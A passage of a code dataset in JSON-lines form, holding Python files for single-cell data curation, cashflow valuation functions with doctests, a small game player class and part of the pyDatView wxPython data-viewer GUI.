\"UBERON:0003126\",\n \"ChorionicVillus\": \"UBERON:0007106\",\n \"AdultGallbladder\": \"UBERON:0002110\",\n \"AdultPancreas\": \"UBERON:0001264\",\n \"AdultArtery\": \"UBERON:0001637\",\n \"FetalLung\": \"UBERON:0002048\",\n \"Placenta\": \"UBERON:0001987\",\n \"AdultTemporalLobe\": \"UBERON:0001871\",\n \"AdultBladder\": \"UBERON:0018707\",\n \"AdultBoneMarrow\": \"UBERON:0002371\",\n \"AdultCervix\": \"UBERON:0000002\",\n \"FetalHeart\": \"UBERON:0000948\",\n \"FetalStomach\": \"UBERON:0000945\",\n \"AdultMuscle\": \"UBERON:0001630\",\n \"AdultUterus\": \"UBERON:0000995\",\n \"AdultCerebellum\": \"UBERON:0002037\",\n \"FetalSkin\": \"UBERON:0002097\",\n \"FetalFemaleGonad\": \"UBERON:0000992\",\n \"CordBlood\": \"UBERON:0012168\",\n \"AdultFallopiantube\": \"UBERON:0003889\",\n \"FetalRib\": \"UBERON:0002228\",\n \"FetalSpinalCord\": \"UBERON:0002240\",\n \"NeonatalAdrenalGland\": \"UBERON:0002369\",\n \"AdultRectum\": \"UBERON:0001052\",\n \"AdultJeJunum\": \"UBERON:0002115\",\n \"FetalCalvaria\": \"UBERON:0004339\",\n 
\"AdultDuodenum\": \"UBERON:0002114\",\n \"FetalThymus\": \"UBERON:0002370\",\n \"AdultEpityphlon\": \"UBERON:0001154\",\n \"AdultIleum\": \"UBERON:0002116\",\n \"AdultSigmoidColon\": \"UBERON:0001159\",\n \"AdultHeart\": \"UBERON:0000948\",\n \"AdultProstate\": \"UBERON:0002367\",\n \"AdultUreter\": \"UBERON:0000056\",\n \"AdultAscendingColon\": \"UBERON:0001156\",\n \"FetalEyes\": \"UBERON:0000970\",\n \"HESC\": \"\",\n \"AdultAdipose\": \"UBERON:0001013\",\n }\n tissue_map = {k: utils.ontology.get_ontology_label(v) for k, v in tissue_ontology_map.items()}\n tissue_map[\"HESC\"] = \"HESC\"\n adata.obs[\"tissue_ontology\"] = adata.obs[\"original_tissue\"].replace(tissue_ontology_map, inplace=False)\n adata.obs[\"tissue\"] = adata.obs[\"original_tissue\"].replace(tissue_map, inplace=False)\n\n adata.obs[\"cell_type_ontology\"] = \"\"\n adata.obs[\"cell_type\"] = \"\"\n adata.obs[\"ethnicity_ontology\"] = \"HANCESTRO:0027\"\n adata.obs[\"ethnicity\"] = utils.ontology.get_ontology_label(\"HANCESTRO:0027\")\n adata.obs[\"sex\"] = \"unknown\"\n\n development_stage_ontology_map = {}\n for k in tissue_ontology_map:\n if k.startswith(\"Adult\") or k in (\n \"CordBlood\",\n \"Placenta\",\n \"ChorionicVillus\",\n \"CordBloodCD34P\",\n ):\n development_stage_ontology_map[k] = \"HsapDv:0000087\"\n elif k.startswith(\"Fetal\"):\n development_stage_ontology_map[k] = \"HsapDv:0000037\"\n elif k.startswith(\"Neonatal\"):\n development_stage_ontology_map[k] = \"HsapDv:0000082\"\n elif k == \"HESC\":\n development_stage_ontology_map[k] = \"HsapDv:0000002\"\n development_stage_map = {k: utils.ontology.get_ontology_label(v) for k, v in development_stage_ontology_map.items()}\n adata.obs[\"development_stage_ontology\"] = adata.obs[\"original_tissue\"].replace(\n development_stage_ontology_map, inplace=False\n )\n adata.obs[\"development_stage\"] = adata.obs[\"original_tissue\"].replace(development_stage_map, inplace=False)\n\n adata.uns[\"layer_descriptions\"] = {\"X\": \"log1p CPM\"}\n\n upgraded_var_index = utils.hgnc.get_upgraded_var_index(adata.var)\n merged_df = pd.DataFrame(np.expm1(adata.X), index=adata.obs.index, columns=upgraded_var_index).sum(\n axis=1, level=0, skipna=False\n )\n\n remix_adata = anndata.AnnData(\n X=np.log1p(merged_df.to_numpy()),\n obs=adata.obs,\n var=merged_df.columns.to_frame(name=\"hgnc_gene_symbol\"),\n uns=adata.uns,\n obsm=adata.obsm,\n varm=adata.varm,\n )\n\n return remix_adata\n\n\ndef main():\n original_filename = \"human_cell_landscape-3-original.h5ad\"\n curated_filename = \"human_cell_landscape-3-curated.h5ad\"\n remixed_filename = \"human_cell_landscape-3-remixed.h5ad\"\n\n # Read raw, X has most of the genes filtered out\n adata = sc.read_h5ad(original_filename).raw.to_adata()\n basic_curation(adata)\n adata.write(curated_filename, compression=\"gzip\")\n remix_adata = remix(adata)\n remix_adata.write(remixed_filename, compression=\"gzip\")\n\n\nmain()\n","sub_path":"backend/scripts/curation/human_cell_landscape-3/curate.py","file_name":"curate.py","file_ext":"py","file_size_in_byte":7579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191629337","text":"\"\"\"\n\nNet present value\n===============================================================================\n\n\n>>> marr = nominal_rate([12]*5)\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> timevalue(cflo=cflo, marr=marr) # doctest: +ELLIPSIS\n103.73...\n\n\n>>> timevalue(cflo=[cflo, cflo], marr=marr) # doctest: +ELLIPSIS\n[103.73..., 103.73...]\n\n>>> 
timevalue(cflo=cflo, marr=[marr, marr]) # doctest: +ELLIPSIS\n[103.73..., 103.73...]\n\n>>> timevalue(cflo=[cflo, cflo], marr=[marr, marr]) # doctest: +ELLIPSIS\n[103.73..., 103.73...]\n\n>>> timevalue(cflo=[cflo, cflo], marr=[marr, marr], base_date=[4, 4]) # doctest: +ELLIPSIS\n[163.22..., 163.22...]\n\n\n\nNet uniform series\n===============================================================================\n\n>>> marr = nominal_rate([12]*5)\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> net_uniform_series(cflo, marr) # doctest: +ELLIPSIS\n116.18...\n\n\n>>> net_uniform_series([cflo, cflo], marr) # doctest: +ELLIPSIS\n[116.18..., 116.18...]\n\n>>> net_uniform_series(cflo, [marr, marr]) # doctest: +ELLIPSIS\n[116.18..., 116.18...]\n\n>>> net_uniform_series([cflo, cflo], [marr, marr]) # doctest: +ELLIPSIS\n[116.18..., 116.18...]\n\n>>> net_uniform_series([cflo, cflo], [marr, marr], nper=5) # doctest: +ELLIPSIS\n[28.77..., 28.77...]\n\n>>> net_uniform_series([cflo, cflo], [marr, marr], nper=[5, 5]) # doctest: +ELLIPSIS\n[28.77..., 28.77...]\n\n\n\n\nBenefit-Cost ratio\n===============================================================================\n\n>>> marr = nominal_rate([12]*5)\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> benefit_cost_ratio(cflo, marr) # doctest: +ELLIPSIS\n1.518...\n\n>>> benefit_cost_ratio([cflo, cflo], marr) # doctest: +ELLIPSIS\n[1.518..., 1.518...]\n\n>>> benefit_cost_ratio(cflo, [marr, marr]) # doctest: +ELLIPSIS\n[1.518..., 1.518...]\n\n>>> benefit_cost_ratio([cflo, cflo], [marr, marr]) # doctest: +ELLIPSIS\n[1.518..., 1.518...]\n\n>>> benefit_cost_ratio([cflo, cflo], [marr, marr], [0, 0]) # doctest: +ELLIPSIS\n[1.518..., 1.518...]\n\n\n\n\nInternal Rate of Return\n===============================================================================\n\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> irr(cflo) # doctest: +ELLIPSIS\n34.90...\n\nModified Internal Rate of Return\n===============================================================================\n\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> mirr(cflo) # doctest: +ELLIPSIS\n18.92...\n\n\nDescription of the functions in this module\n===============================================================================\n\n\n\"\"\"\n\nimport numpy as np\nfrom cashflows.gtimeseries import TimeSeries, cashflow, nominal_rate, verify_eq_time_range\nfrom cashflows.gcashcomp import to_discount_factor, equivalent_nrate, vars2list\nfrom cashflows.basics import tvmm\nfrom cashflows.utilityfun import exp_utility_fun, log_utility_fun, sqrt_utility_fun\n# from cashflows.basics import amort\n\n\n\ndef timevalue(cflo, marr, base_date=0, utility=None):\n \"\"\"\n Computes the net value of a cashflow at time `base_date`.\n\n Args:\n cflo (TimeSeries, list of TimeSeries): cashflow.\n marr (TimeSeries): Minimum atractive interest rate.\n base_date (int, tuple): Time.\n utility (function): utility function\n\n Returns:\n net value (float, list of floats)\n\n >>> marr = nominal_rate([12]*5)\n >>> cflo = cashflow([100]*5, spec = (0, -200))\n >>> timevalue(cflo, marr) # doctest: +ELLIPSIS\n 103.73...\n\n >>> timevalue(cflo, marr, 4) # doctest: +ELLIPSIS\n 163.22...\n\n >>> timevalue(cflo, marr, base_date=0, utility=exp_utility_fun(200)) # doctest: +ELLIPSIS\n -84.15...\n\n >>> timevalue(cflo, marr, base_date=0, utility=log_utility_fun(210)) # doctest: +ELLIPSIS\n 369092793...\n\n >>> timevalue(cflo, marr, base_date=0, utility=sqrt_utility_fun(210)) # doctest: +ELLIPSIS\n 2998.12...\n\n \"\"\"\n params = vars2list([cflo, marr, 
base_date])\n cflo = params[0]\n marr = params[1]\n base_date = params[2]\n retval = []\n for xcflo, xmarr, xbase_date in zip(cflo, marr, base_date):\n if not isinstance(xcflo, TimeSeries):\n raise TypeError(\"`cflo` must be a TimeSeries\")\n if not isinstance(xmarr, TimeSeries):\n raise TypeError(\"`marr` must be a TimeSeries\")\n verify_eq_time_range(xcflo, xmarr)\n netval = 0\n factor = to_discount_factor(xmarr, xbase_date)\n for time, _ in enumerate(xcflo):\n if utility is None:\n xcflo_aux = xcflo[time]\n else:\n xcflo_aux = utility(xcflo[time])\n netval += xcflo_aux * factor[time]\n if utility is not None:\n netval = utility(netval, inverse=True)\n retval.append(netval)\n if len(retval) == 1:\n return retval[0]\n return retval\n\n\ndef net_uniform_series(cflo, marr, nper=1):\n \"\"\"Computes a net uniform series equivalent of a cashflow.\n\n Args:\n cflo (cashflow): cashflow.\n marr (TimeSeries): Minimum atractive interest rate.\n nper (int, list): number of equivalent payment periods.\n\n Returns:\n net uniform series (float)\n\n \"\"\"\n params = vars2list([cflo, marr, nper])\n cflo = params[0]\n marr = params[1]\n nper = params[2]\n retval = []\n for xcflo, xmarr, xnper in zip(cflo, marr, nper):\n netval = timevalue(cflo=xcflo, marr=xmarr, base_date=0)\n erate = equivalent_nrate(xmarr)\n retval.append(-tvmm(nrate=erate, nper=xnper, pval=netval, fval=0, pmt=None))\n if len(retval) == 1:\n return retval[0]\n return retval\n\n\ndef benefit_cost_ratio(cflo, marr, base_date=0):\n \"\"\"\n Computes a benefit cost ratio at time `base_date` of a cashflow.\n\n Args:\n rate (int float, Rate): Minimum atractive interest rate.\n cashflow (cashflow, list): cashflow.\n base_date (int, list): Time.\n\n Returns:\n (float) net present value.\n\n \"\"\"\n\n params = vars2list([marr, cflo, base_date])\n marr = params[0]\n cflo = params[1]\n base_date = params[2]\n\n retval = []\n for xmarr, xcflo, xbase_date in zip(marr, cflo, base_date):\n verify_eq_time_range(xcflo, xmarr)\n num = 0\n den = 0\n num = xcflo.copy()\n den = xcflo.copy()\n for time, _ in enumerate(xcflo):\n if xcflo[time] >= 0.0:\n den[time] = 0\n else:\n num[time] = 0\n retval.append(-timevalue(num, xmarr, xbase_date) / timevalue(den, xmarr, xbase_date))\n\n if len(retval) == 1:\n return retval[0]\n return retval\n\n\n\ndef irr(cflo):\n \"\"\"Computes the internal rate of return.\n\n Args:\n cashflow (TimeSeries): cashflow.\n\n Returns:\n (float) net uniform series.\n\n \"\"\"\n if isinstance(cflo, TimeSeries):\n cflo = [cflo]\n retval = []\n for xcflo in cflo:\n retval.append(100 * xcflo.pyr * np.irr(xcflo.tolist()))\n if len(retval) == 1:\n return retval[0]\n return retval\n\n## modified internal rate of return\ndef mirr(cflo, finance_rate=0, reinvest_rate=0):\n \"\"\"Computes the modified internal rate of return.\n\n Args:\n cashflow (list, cashflow): cashflow.\n finance_rate (float): rate applied to negative values of the cashflow\n reinvest_rate (float): rate applied to positive values of the cashflow\n\n Returns:\n (float) modified internal rate of return.\n\n \"\"\"\n # negativos: finance_rate\n # positivos: reinvest_rate\n if isinstance(cflo, TimeSeries):\n cflo = [cflo]\n retval = []\n for xcflo in cflo:\n retval.append(100 * xcflo.pyr * np.mirr(xcflo.tolist(),\n finance_rate,\n reinvest_rate))\n\n if len(retval) == 1:\n return retval[0]\n return retval\n\ndef table(data):\n \"\"\"Prints the list `data` as a table\n\n Args:\n data:\n \"\"\"\n print(' # Value')\n print('------------------------')\n #\n data = [round(element, 
4) for element in data]\n\n for index, _ in enumerate(data):\n print(' {:<3d} {:14.4f}'.format(index, data[index]))\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"cashflows/gcashana.py","file_name":"gcashana.py","file_ext":"py","file_size_in_byte":8154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389319378","text":"class Player:\n def __init__(self, player_name):\n self.player_name = player_name\n self.life_left = 5\n self.collected_money = 0\n self.start_time = 0\n self.time_spent = 0\n\n def did_you_die(self):\n \"\"\"Take one life and report whether the player is out of lives.\"\"\"\n self.life_left = self.life_left - 1\n return self.life_left == 0\n\n def you_collected(self, how_much_collected):\n self.collected_money = self.collected_money + how_much_collected\n","sub_path":"class_of_player.py","file_name":"class_of_player.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"272624700","text":"from __future__ import division, unicode_literals, print_function, absolute_import\nfrom builtins import map, range, chr, str\nfrom io import open\nfrom future import standard_library\nstandard_library.install_aliases()\n\nimport sys\nimport numpy as np\nimport os.path \ntry:\n import pandas as pd\nexcept:\n print('')\n print('')\n print('Error: problem loading pandas package:')\n print(' - Check if this package is installed ( e.g. type: `pip install pandas`)')\n print(' - If you are using anaconda, try `conda update python.app`')\n print(' - If none of the above work, contact the developer.')\n print('')\n print('')\n sys.exit(-1) # `sys` is now imported above, so this exit works when pandas is missing\n #raise\n\nimport traceback \nimport gc\n\n# GUI\nimport wx\nfrom .GUIPlotPanel import PlotPanel\nfrom .GUISelectionPanel import SelectionPanel,SEL_MODES,SEL_MODES_ID\nfrom .GUISelectionPanel import ColumnPopup,TablePopup\nfrom .GUIInfoPanel import InfoPanel\nfrom .Tables import Table, haveSameColumns\n# Helper\nfrom .common import *\nfrom .GUICommon import *\n\n\n\n# --------------------------------------------------------------------------------}\n# --- GLOBAL \n# --------------------------------------------------------------------------------{\nPROG_NAME='pyDatView'\nPROG_VERSION='v0.1-local'\ntry:\n import weio # File Formats and File Readers\n FILE_FORMATS= weio.fileFormats()\nexcept:\n print('')\n print('Error: the python package `weio` was not imported successfully.\\n')\n print('Most likely the submodule `weio` was not cloned with `pyDatView`')\n print('Type the following command to retrieve it:\\n')\n print(' git submodule update --init --recursive\\n')\n print('Alternatively re-clone this repository into a separate folder:\\n')\n print(' git clone --recurse-submodules https://github.com/ebranlard/pyDatView\\n')\n sys.exit(-1)\nFILE_FORMATS_EXTENSIONS = [['.*']]+[f.extensions for f in FILE_FORMATS]\nFILE_FORMATS_NAMES = ['auto (any supported file)'] + [f.name for f in FILE_FORMATS]\nFILE_FORMATS_NAMEXT =['{} ({})'.format(n,','.join(e)) for n,e in zip(FILE_FORMATS_NAMES,FILE_FORMATS_EXTENSIONS)]\nFILE_READER = weio.read\n\nSIDE_COL = [160,160,300,420]\nBOT_PANL =85\n\n#matplotlib.rcParams['text.usetex'] = False\n# matplotlib.rcParams['font.sans-serif'] = 'DejaVu Sans'\n#matplotlib.rcParams['font.family'] = 'Arial'\n#matplotlib.rcParams['font.sans-serif'] = 'Arial'\n# matplotlib.rcParams['font.family'] = 'sans-serif'\n\n\n\n\n\n# 
--------------------------------------------------------------------------------}\n# --- Drag and drop \n# --------------------------------------------------------------------------------{\n# Implement File Drop Target class\nclass FileDropTarget(wx.FileDropTarget):\n def __init__(self, parent):\n wx.FileDropTarget.__init__(self)\n self.parent = parent\n def OnDropFiles(self, x, y, filenames):\n filenames = [f for f in filenames if not os.path.isdir(f)]\n if len(filenames)>0:\n # If Ctrl is pressed we add\n bAdd= wx.GetKeyState(wx.WXK_CONTROL);\n iFormat=self.parent.comboFormats.GetSelection()\n if iFormat==0: # auto-format\n Format = None\n else:\n Format = FILE_FORMATS[iFormat-1]\n self.parent.load_files(filenames,fileformat=Format,bAdd=bAdd)\n return True\n\n\n\n\n# --------------------------------------------------------------------------------}\n# --- Main Frame \n# --------------------------------------------------------------------------------{\nclass MainFrame(wx.Frame):\n def __init__(self, filename=None):\n # Parent constructor\n wx.Frame.__init__(self, None, -1, PROG_NAME+' '+PROG_VERSION)\n # Data\n self.tabs=[]\n \n # Hooking exceptions to display them to the user\n sys.excepthook = MyExceptionHook\n # --- GUI\n #font = self.GetFont()\n #print(font.GetFamily(),font.GetStyle(),font.GetPointSize())\n #font.SetFamily(wx.FONTFAMILY_DEFAULT)\n #font.SetFamily(wx.FONTFAMILY_MODERN)\n #font.SetFamily(wx.FONTFAMILY_SWISS)\n #font.SetPointSize(8)\n #print(font.GetFamily(),font.GetStyle(),font.GetPointSize())\n #self.SetFont(font) \n # --- Menu\n menuBar = wx.MenuBar()\n\n fileMenu = wx.Menu()\n loadMenuItem = fileMenu.Append(wx.ID_NEW,\"Open file\" ,\"Open file\" )\n exptMenuItem = fileMenu.Append(-1 ,\"Export table\" ,\"Export table\" )\n saveMenuItem = fileMenu.Append(wx.ID_SAVE,\"Save figure\" ,\"Save figure\" )\n exitMenuItem = fileMenu.Append(wx.ID_EXIT, 'Quit', 'Quit application')\n menuBar.Append(fileMenu, \"&File\")\n self.Bind(wx.EVT_MENU,self.onExit ,exitMenuItem )\n self.Bind(wx.EVT_MENU,self.onLoad ,loadMenuItem )\n self.Bind(wx.EVT_MENU,self.onExport ,exptMenuItem )\n self.Bind(wx.EVT_MENU,self.onSave ,saveMenuItem )\n\n toolMenu = wx.Menu()\n dmpDecayMenuItem = toolMenu.Append(wx.ID_ANY, 'Damping from decay')\n menuBar.Append(toolMenu, \"&Tools\")\n self.Bind(wx.EVT_MENU,self.onDamping,dmpDecayMenuItem)\n\n helpMenu = wx.Menu()\n aboutMenuItem = helpMenu.Append(wx.NewId(), 'About', 'About')\n menuBar.Append(helpMenu, \"&Help\")\n self.SetMenuBar(menuBar)\n self.Bind(wx.EVT_MENU,self.onAbout,aboutMenuItem)\n\n # --- ToolBar\n tb = self.CreateToolBar(wx.TB_HORIZONTAL|wx.TB_TEXT|wx.TB_HORZ_LAYOUT)\n self.toolBar = tb \n self.comboFormats = wx.ComboBox(tb, choices = FILE_FORMATS_NAMEXT, style=wx.CB_READONLY) \n self.comboFormats.SetSelection(0)\n self.comboMode = wx.ComboBox(tb, choices = SEL_MODES, style=wx.CB_READONLY) \n self.comboMode.SetSelection(0)\n self.Bind(wx.EVT_COMBOBOX, self.onModeChange, self.comboMode )\n tb.AddSeparator()\n tb.AddControl( wx.StaticText(tb, -1, 'Mode: ' ) )\n tb.AddControl( self.comboMode ) \n tb.AddStretchableSpace()\n tb.AddControl( wx.StaticText(tb, -1, 'Format: ' ) )\n tb.AddControl(self.comboFormats ) \n tb.AddSeparator()\n #bmp = wx.Bitmap('help.png') #wx.Bitmap(\"NEW.BMP\", wx.BITMAP_TYPE_BMP) \n self.AddTBBitmapTool(tb,\"Open\" ,wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN),self.onLoad)\n self.AddTBBitmapTool(tb,\"Reload\",wx.ArtProvider.GetBitmap(wx.ART_REDO),self.onReload)\n try:\n self.AddTBBitmapTool(tb,\"Add\" 
,wx.ArtProvider.GetBitmap(wx.ART_PLUS),self.onAdd)\n except:\n self.AddTBBitmapTool(tb,\"Add\" ,wx.ArtProvider.GetBitmap(wx.FILE_OPEN),self.onAdd)\n #self.AddTBBitmapTool(tb,\"Debug\" ,wx.ArtProvider.GetBitmap(wx.ART_ERROR),self.onAdd)\n tb.AddStretchableSpace()\n tb.Realize() \n\n # --- Status bar\n self.statusbar=self.CreateStatusBar(3, style=0)\n self.statusbar.SetStatusWidths([230, -1, 70])\n\n # --- Main Panel and Notebook\n self.MainPanel = wx.Panel(self)\n #self.MainPanel = wx.Panel(self, style=wx.RAISED_BORDER)\n #self.MainPanel.SetBackgroundColour((200,0,0))\n\n #self.nb = wx.Notebook(self.MainPanel)\n #self.nb.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.on_tab_change)\n\n\n sizer = wx.BoxSizer()\n #sizer.Add(self.nb, 1, flag=wx.EXPAND)\n self.MainPanel.SetSizer(sizer)\n\n # --- Drag and drop\n dd = FileDropTarget(self)\n self.SetDropTarget(dd)\n\n # --- Main Frame (self)\n self.FrameSizer = wx.BoxSizer(wx.VERTICAL)\n slSep = wx.StaticLine(self, -1, size=wx.Size(-1,1), style=wx.LI_HORIZONTAL)\n self.FrameSizer.Add(slSep ,0, flag=wx.EXPAND|wx.BOTTOM,border=0)\n self.FrameSizer.Add(self.MainPanel,1, flag=wx.EXPAND,border=0)\n self.SetSizer(self.FrameSizer)\n\n self.SetSize((800, 600))\n self.Center()\n\n self.Show()\n\n def AddTBBitmapTool(self,tb,label,bitmap,callback=None,Type=None):\n \"\"\" Adding a toolbar tool, safe depending on interface\"\"\"\n # Modern API\n if Type is None or Type==0:\n try:\n tl = tb.AddTool( -1, bitmap=bitmap, label=label )\n if callback is not None:\n tb.Bind(wx.EVT_TOOL, callback, tl)\n return tl\n except:\n Type=None\n # Old fashion API\n if Type is None or Type==1:\n try:\n tl = tb.AddLabelTool( -1, bitmap=bitmap, label=label )\n if callback is not None:\n tb.Bind(wx.EVT_TOOL, callback, tl)\n return tl\n except:\n Type=None\n # Using a Bitmap \n if Type is None or Type==2:\n try:\n bt=wx.Button(tb,wx.ID_ANY, \" \"+label+\" \", style=wx.BU_EXACTFIT)\n bt.SetBitmapLabel(bitmap)\n tl=tb.AddControl(bt)\n if callback is not None:\n tb.Bind(wx.EVT_BUTTON, callback, bt)\n return tl\n except:\n Type=None\n # Last resort, we add a button only\n bt=wx.Button(tb,wx.ID_ANY, label)\n tl=tb.AddControl(bt)\n if callback is not None:\n tb.Bind(wx.EVT_BUTTON, callback, bt)\n return tl\n\n\n @property\n def filenames(self):\n filenames=[]\n if hasattr(self,'tabs'):\n for t in self.tabs:\n if t.filename not in filenames:\n filenames.append(t.filename)\n #filenames=[t.filename for t in self.tabs] \n return filenames\n\n def clean_memory(self,bReload=False):\n #print('Clean memory')\n # force Memory cleanup\n if hasattr(self,'tabs'):\n del self.tabs\n self.tabs=[]\n if not bReload:\n if hasattr(self,'selPanel'):\n self.selPanel.clean_memory()\n if hasattr(self,'infoPanel'):\n self.infoPanel.clean()\n if hasattr(self,'plotPanel'):\n self.plotPanel.cleanPlot()\n gc.collect()\n\n def load_files(self, filenames=[], fileformat=None, bReload=False, bAdd=False):\n \"\"\" load multiple files, only trigger the plot at the end \"\"\"\n if bReload:\n if hasattr(self,'selPanel'):\n self.selPanel.saveSelection()\n\n if not bAdd:\n self.clean_memory(bReload=bReload)\n\n tabs=[]\n for f in filenames:\n if f in self.filenames:\n Error(self,'Cannot add a file already opened')\n else:\n tabs += self._load_file_tabs(f,fileformat=fileformat)\n if len(tabs)>0:\n # Adding tables\n self.load_tabs(tabs,bReload=bReload,bAdd=bAdd,bPlot=True)\n\n def _load_file_tabs(self,filename,fileformat=None):\n \"\"\" load a single file, adds table, and potentially trigger plotting \"\"\"\n 
self.statusbar.SetStatusText('');\n self.statusbar.SetStatusText('',1);\n self.statusbar.SetStatusText('',2);\n print(fileformat)\n\n if not os.path.isfile(filename):\n Error(self,'File not found: '+filename)\n return []\n try:\n F = FILE_READER(filename,fileformat = fileformat)\n dfs = F.toDataFrame()\n except weio.FileNotFoundError as e:\n Error(self, 'A file was not found!\\n\\n While opening:\\n\\n {}\\n\\n the following file was not found:\\n\\n {}'.format(filename, e.filename))\n return []\n except IOError:\n Error(self, 'IO Error thrown while opening file: '+filename )\n return []\n except MemoryError:\n Error(self,'Insufficient memory!\\n\\nFile: '+filename+'\\n\\nTry closing and reopening the program, or use a 64 bit version of this program (i.e. of python).')\n return []\n except weio.EmptyFileError:\n Error(self,'File empty!\\n\\nFile is empty: '+filename+'\\n\\nOpen a different file.')\n return []\n except weio.FormatNotDetectedError:\n Error(self,'File format not detected!\\n\\nFile: '+filename+'\\n\\nUse an explicit file-format from the list')\n return []\n except weio.WrongFormatError as e:\n Error(self,'Wrong file format!\\n\\nFile: '+filename+'\\n\\n' \\\n 'The file parser for the selected format failed to open the file.\\n\\n'+ \\\n 'The reported error was:\\n'+e.args[0]+'\\n\\n' + \\\n 'Double-check your file format and report this error if you think it''s a bug.')\n return []\n except weio.BrokenFormatError as e:\n Error(self,'Inconsistency in the file format!\\n\\nFile: '+filename+'\\n\\n' \\\n 'The reported error was:\\n'+e.args[0]+'\\n\\n' + \\\n 'Double-check your file format and report this error if you think it''s a bug.')\n return []\n except:\n raise\n\n # Creating a list of tables\n tabs=[]\n if not isinstance(dfs,dict):\n if len(dfs)>0:\n tabs=[Table(df=dfs, name='default', filename=filename)]\n else:\n for k in list(dfs.keys()):\n if len(dfs[k])>0:\n tabs.append(Table(df=dfs[k], name=k, filename=filename))\n\n self.statusbar.SetStatusText(F.filename,1)\n if fileformat is None:\n self.statusbar.SetStatusText('Detected: '+F.formatName())\n else:\n self.statusbar.SetStatusText('Format: '+F.formatName())\n self.fileformatName = F.formatName()\n if len(tabs)<=0:\n Warn(self,'No dataframe found in file: '+filename)\n return []\n else:\n return tabs\n \n\n def load_df(self, df):\n tab=[Table(df=df, name='default')]\n self.load_tabs(tab)\n\n def load_tabs(self, tabs, bReload=False, bAdd=False, bPlot=True):\n if bAdd:\n if not hasattr(self,'selPanel'):\n bAdd=False\n\n if (not bReload) and (not bAdd):\n self.cleanGUI()\n\n if bAdd:\n self.tabs=self.tabs+tabs\n else:\n self.tabs=tabs\n ##\n if len(self.tabs)==1:\n self.statusbar.SetStatusText('{}x{}'.format(self.tabs[0].nCols,self.tabs[0].nRows),2)\n\n if bReload or bAdd:\n self.selPanel.update_tabs(self.tabs)\n else:\n #\n mode = SEL_MODES_ID[self.comboMode.GetSelection()]\n #self.vSplitter = wx.SplitterWindow(self.nb)\n self.vSplitter = wx.SplitterWindow(self.MainPanel)\n self.selPanel = SelectionPanel(self.vSplitter, self.tabs, mode=mode, mainframe=self)\n self.tSplitter = wx.SplitterWindow(self.vSplitter)\n #self.tSplitter.SetMinimumPaneSize(20)\n self.infoPanel = InfoPanel(self.tSplitter)\n self.plotPanel = PlotPanel(self.tSplitter, self.selPanel, self.infoPanel)\n self.tSplitter.SetSashGravity(0.9)\n self.tSplitter.SplitHorizontally(self.plotPanel, self.infoPanel)\n self.tSplitter.SetMinimumPaneSize(BOT_PANL)\n self.tSplitter.SetSashGravity(1)\n self.tSplitter.SetSashPosition(400)\n\n 
self.vSplitter.SplitVertically(self.selPanel, self.tSplitter)\n self.vSplitter.SetMinimumPaneSize(SIDE_COL[0])\n self.tSplitter.SetSashPosition(SIDE_COL[0])\n\n #self.nb.AddPage(self.vSplitter, \"Plot\")\n #self.nb.SendSizeEvent()\n\n sizer = self.MainPanel.GetSizer()\n sizer.Add(self.vSplitter, 1, flag=wx.EXPAND,border=0)\n self.MainPanel.SetSizer(sizer)\n self.FrameSizer.Layout()\n\n self.Bind(wx.EVT_COMBOBOX, self.onColSelectionChange, self.selPanel.colPanel1.comboX )\n self.Bind(wx.EVT_LISTBOX , self.onColSelectionChange, self.selPanel.colPanel1.lbColumns)\n self.Bind(wx.EVT_COMBOBOX, self.onColSelectionChange, self.selPanel.colPanel2.comboX )\n self.Bind(wx.EVT_LISTBOX , self.onColSelectionChange, self.selPanel.colPanel2.lbColumns)\n self.Bind(wx.EVT_LISTBOX , self.onTabSelectionChange, self.selPanel.tabPanel.lbTab)\n self.Bind(wx.EVT_SPLITTER_SASH_POS_CHANGED, self.onSashChangeMain, self.vSplitter)\n\n self.selPanel.tabPanel.lbTab.Bind(wx.EVT_RIGHT_DOWN, self.OnTabPopup)\n \n\n # plot trigger\n if bPlot:\n self.mainFrameUpdateLayout()\n self.onColSelectionChange(event=None)\n\n def renameTable(self, iTab, newName):\n oldName = self.tabs[iTab].name\n if newName in [t.name for t in self.tabs]:\n Error(self,'This table already exist, choose a different name.')\n return\n # Renaming table\n self.tabs[iTab].rename(newName)\n # Lowlevel update of GUI\n self.selPanel.renameTable(iTab, oldName, newName)\n\n def deleteTabs(self, I):\n # removing table slections\n # TODO TODO TODO self.selPanel.tabSelections[t.name]\n # \n self.tabs = [t for i,t in enumerate(self.tabs) if i not in I]\n\n # Invalidating selections\n self.selPanel.tabPanel.lbTab.SetSelection(-1)\n # Until we have something better, we empty plot\n self.plotPanel.empty()\n self.infoPanel.empty()\n self.selPanel.clean_memory()\n # Updating tables\n self.selPanel.update_tabs(self.tabs)\n # Trigger a replot\n self.onTabSelectionChange()\n\n def exportTab(self, iTab):\n default_filename=os.path.splitext(os.path.basename(self.tabs[iTab].filename))[0]+'.csv'\n with wx.FileDialog(self, \"Save to CSV file\",defaultFile=default_filename,\n style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as dlg:\n #, wildcard=\"CSV files (*.csv)|*.csv\",\n dlg.CentreOnParent()\n if dlg.ShowModal() == wx.ID_CANCEL:\n return # the user changed their mind\n if isinstance(self.tabs[iTab].data, pd.DataFrame):\n try:\n self.tabs[iTab].data.to_csv(dlg.GetPath(),sep=',',index=False) #python3\n except:\n self.tabs[iTab].data.to_csv(dlg.GetPath(),sep=str(u',').encode('utf-8'),index=False) #python 2.\n else:\n raise NotImplementedError('Export of data that is not a dataframe')\n\n def onDamping(self, event=None):\n if not hasattr(self,'plotPanel'):\n Error(self,'Plot some data first')\n return\n self.plotPanel.showTool('LogDec')\n\n def onSashChangeMain(self,event=None):\n pass\n # doent work because size is not communicated yet\n #if hasattr(self,'selPanel'):\n # print('ON SASH')\n # 